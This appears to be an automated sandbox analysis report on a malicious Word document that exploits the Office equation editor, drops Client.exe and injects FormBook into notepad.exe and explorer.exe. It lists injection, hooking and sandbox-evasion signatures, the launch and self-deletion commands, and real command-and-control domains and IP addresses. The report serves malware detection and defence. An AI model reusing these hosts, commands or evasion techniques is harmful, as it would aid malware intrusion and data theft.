          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02406A32 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02403633 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02405E3B push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_024032E4 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02405AEF push 00000003h; ret
          Source: Client.exe.0.drStatic PE information: section name: 5++.8$
          Source: Client.exe.0.drStatic PE information: section name:
          Source: initial sampleStatic PE information: section name: 5++.8$ entropy: 7.999437666681734

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\notepad.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\notepad.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 772Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2524Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000d-dv
          Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000A.00000000.1027538105.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.1007549733.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004D33F8 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.best-boy.net
          Source: C:\Windows\explorer.exeNetwork Connect: 104.167.67.175 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.170 80
          Source: C:\Windows\explorer.exeDomain query: www.thegoldencamel.online
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5A
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000
          Source: C:\Windows\SysWOW64\notepad.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 370000
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 401000
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 80000
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 77A7975D
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts43
          Exploitation for Client Execution          		Boot or Logon Initialization Scripts812
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory113
          System Information Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)4
          Obfuscated Files or Information          		Security Account Manager221
          Security Software Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Rootkit          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Masquerading          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)812
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 680528 Sample: SecuriteInfo.com.Exploit.Rt... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 46 Snort IDS alert for network traffic 2->46 48 Document contains OLE streams which likely are hidden ActiveX objects 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 14 other signatures 2->52 11 EQNEDT32.EXE 47 2->11         started        14 WINWORD.EXE 292 21 2->14         started        process3 file4 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->74 17 cmd.exe 11->17         started        34 C:\Users\user\AppData\Local\Temp\Client.exe, PE32 14->34 dropped 36 C:\Users\user\...\Client.exe:Zone.Identifier, ASCII 14->36 dropped 38 ~WRF{4F98E955-E40B...E-253D7E3CD6E7}.tmp, Composite 14->38 dropped 76 Document exploit detected (creates forbidden files) 14->76 signatures5 process6 process7 19 Client.exe 17->19         started        signatures8 54 Multi AV Scanner detection for dropped file 19->54 56 Machine Learning detection for dropped file 19->56 58 Writes to foreign memory regions 19->58 60 3 other signatures 19->60 22 notepad.exe 19->22         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 22->62 64 Maps a DLL or memory area into another process 22->64 66 Sample uses process hollowing technique 22->66 68 2 other signatures 22->68 25 explorer.exe 22->25 injected process11 dnsIp12 40 www.best-boy.net 104.167.67.175, 49172, 80 ESITEDUS United States 25->40 42 thegoldencamel.online 66.235.200.170, 49171, 80 CLOUDFLARENETUS United States 25->42 44 www.thegoldencamel.online 25->44 70 System process connects to network (likely due to code injection or exploit) 25->70 72 Uses ipconfig to lookup or modify the Windows network settings 25->72 29 ipconfig.exe 25->29         started        signatures13 process14 signatures15 78 Modifies the context of a thread in another process (thread injection) 29->78 80 Maps a DLL or memory area into another process 29->80 82 Tries to detect virtualization through RDTSC time measurements 29->82 32 cmd.exe 29->32         started        process16

          Screenshots

